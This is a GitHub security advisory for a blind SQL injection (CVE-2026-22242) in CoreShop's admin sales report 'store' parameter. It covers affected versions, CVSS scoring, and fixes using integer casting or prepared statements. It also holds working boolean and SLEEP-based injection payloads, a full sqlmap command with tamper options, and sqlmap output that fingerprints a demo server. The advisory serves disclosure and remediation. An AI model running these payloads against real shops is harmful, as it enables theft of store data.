Skip to content

CoreShop Vulnerable to SQL Injection via Admin Reports

Moderate severity GitHub Reviewed Published Jan 7, 2026 in coreshop/CoreShop • Updated Jan 12, 2026

Package

composer coreshop/core-shop (Composer)

Affected versions

<= 4.1.7

Patched versions

4.1.8

Description

Affected Version(s)

  • CoreShop 4.1.2 Demo (tested) Demo | CoreShop
  • Earlier versions may also be affected if the same code path exists

Summary

A blind SQL injection vulnerability exists in the application that allows an authenticated administrator-level user to extract database contents using boolean-based or time-based techniques.
The database account used by the application is read-only and non-DBA, limiting impact to confidential data disclosure only. No data modification or service disruption is possible.

Details

The vulnerability occurs due to unsanitized user input being concatenated into a SQL query without proper parameterization.

An attacker with administrative access can manipulate the affected parameter to influence the backend SQL query logic. Although no direct query output is returned, boolean and time-based inference techniques allow an attacker to extract data from the database.

Impact

Vulnerability Type: Blind SQL Injection

Impact: Confidentiality only

An attacker can:

  • Enumerate database schema
  • Extract all data accessible to the application’s database user

CVSS v3.1 (Base Score: 4.9 – Medium)

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Steps to Reproduce:

1

  1. Send a Normal Request:
    • Request the report endpoint with a valid store value (e.g. store=1) and observe that data is returned.

2

  1. Inject a Boolean TRUE Condition:
    • Modify the parameter to store=1 AND 1=1.
    • The response returns the same data as the normal request.

3

  1. Inject a Boolean FALSE Condition:
    • Modify the parameter to store=1 AND 2=1.
    • The response returns an empty dataset.

4

  1. Confirm Injection Behavior:

    • The difference between TRUE and FALSE conditions confirms that the store parameter directly affects SQL query logic, indicating a boolean-based blind SQL injection.
  2. Automated Confirmation Using sqlmap:

    • The vulnerable request was tested using sqlmap with the store parameter.
    • sqlmap successfully confirmed the parameter as boolean-based and time-based blind SQL injectable.
    • The tool was able to fingerprint the backend environment, including:
      • Database Management System (DBMS)
      • Database hostname
      • PHP version
      • Available database names
    • This confirms that the injection is exploitable beyond simple logic manipulation and allows database-level information disclosure.

5

C:\sqlmap>python sqlmap.py -r test.txt --random-agent --batch --force-ssl --ignore-code=403,404 --no-cast --tamper=between,randomcase,space2comment --proxy http://127.0.0.1:8080 -p store
---
Parameter: store (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: report=products&_dc=1767718087622&from=1767200400&to=1798650000&store=1 AND 3500=3500&objectType=all&orderState=[]&page=1&start=0&limit=50

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: report=products&_dc=1767718087622&from=1767200400&to=1798650000&store=1 AND (SELECT 6265 FROM (SELECT(SLEEP(5)))KORX)&objectType=all&orderState=[]&page=1&start=0&limit=50
---
web application technology: PHP 8.3.16
back-end DBMS: MySQL >= 5.0.12
hostname: 'coreshop4-demo-php-6c6b7c446f-9qd8w'
available databases [3]:
[*] app
[*] information_schema
[*] performance_schema

Solution

To mitigate the SQL injection risk, user input should not be directly concatenated into SQL queries. The store parameter is expected to represent a numeric store identifier and should therefore be handled safely.

Two possible remediation approaches are recommended:

  1. Strict Type Enforcement (Minimal Fix)

    If the store parameter is intended to be numeric only, enforce integer casting when retrieving the value (e.g. (int) $storeId). This prevents injection by ensuring that only numeric values are used in the query.

  2. Prepared Statements (Best Practice)

    Alternatively, and preferably, the store parameter should be passed using parameter binding, consistent with the handling of other query values in this method. Using prepared statements fully prevents SQL injection and aligns with Doctrine DBAL best practices.

Applying either approach would prevent attackers from injecting SQL logic through the store parameter.

Parameter

  1. /admin/coreshop/report/get-data?report=products&_dc=1767720897882&from=1767200400&to=1798650000&store=1&objectType=all&orderState=%5B%5D&page=1&start=0&limit=50

Line of Code

CoreShop/src/CoreShop/Bundle/CoreBundle/Report/SalesReport.php

Line 64 :

$storeId =$parameterBag->get('store',null);

The store parameter is retrieved directly from the HTTP request via ParameterBag. This value originates from user-controlled input and is not validated or type-cast at this point.

Line 77 :

if (null ===$storeId) {
return [];
}

This check ensures the parameter is present, but does not enforce type safety or restrict the value to an expected format (e.g., integer).

Line 81 :

$store =$this->storeRepository->find($storeId);

The user-supplied value is used to query the repository. While this lookup may fail for invalid values, it does not prevent the same value from later being used in a raw SQL context.

Line 107 :

WHERE orders.store =$storeId
  AND orders.orderState ='$orderCompleteState'
  AND orders.orderDate > ?
  AND orders.orderDate < ?
  AND saleState='" . OrderSaleStates::STATE_ORDER . "'

At this point, the $storeId value is directly concatenated into the SQL query string. Unlike other parameters in the query (orderDate), this value is not bound as a prepared statement parameter.

Example Fixed Code

Option 1: Strict Type Enforcement (Minimal Fix)

If the store parameter is intended to be numeric only, enforce integer casting before using it in the query.

$storeId = (int)$parameterBag->get('store',0);

if ($storeId <=0) {
return [];
}

$sqlQuery = "
    SELECT DATE(FROM_UNIXTIME(orderDate)) AS dayDate, orderDate, SUM(totalGross) AS total
    FROM object_query_$classId AS orders
    WHERE orders.store =$storeId
      AND orders.orderState = '$orderCompleteState'
      AND orders.orderDate > ?
      AND orders.orderDate < ?
      AND saleState = '" .OrderSaleStates::STATE_ORDER . "'
    GROUP BY " .$groupSelector;

This ensures that only numeric values are used and prevents SQL logic injection.

Option 2: Prepared Statements (Recommended Fix)

Use parameter binding for all user-influenced values, including store.

$sqlQuery = "
    SELECT DATE(FROM_UNIXTIME(orderDate)) AS dayDate, orderDate, SUM(totalGross) AS total
    FROM object_query_$classId AS orders
    WHERE orders.store = ?
      AND orders.orderState = ?
      AND orders.orderDate > ?
      AND orders.orderDate < ?
      AND saleState = ?
    GROUP BY " .$groupSelector;

$results =$this->db->fetchAllAssociative(
$sqlQuery,
    [
        (int)$storeId,
$orderCompleteState,
$from->getTimestamp(),
$to->getTimestamp(),
OrderSaleStates::STATE_ORDER,
    ]
);

This approach fully eliminates SQL injection risks and aligns with Doctrine DBAL best practices.

References

@dpfaffenbauer dpfaffenbauer published to coreshop/CoreShop Jan 7, 2026
Published to the GitHub Advisory Database Jan 7, 2026
Reviewed Jan 7, 2026
Published by the National Vulnerability Database Jan 8, 2026
Last updated Jan 12, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(31st percentile)

Weaknesses

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. Learn more on MITRE.

SQL Injection: Hibernate

Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands. Learn more on MITRE.

CVE ID

CVE-2026-22242

GHSA ID

GHSA-ch7p-mpv4-4vg4

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.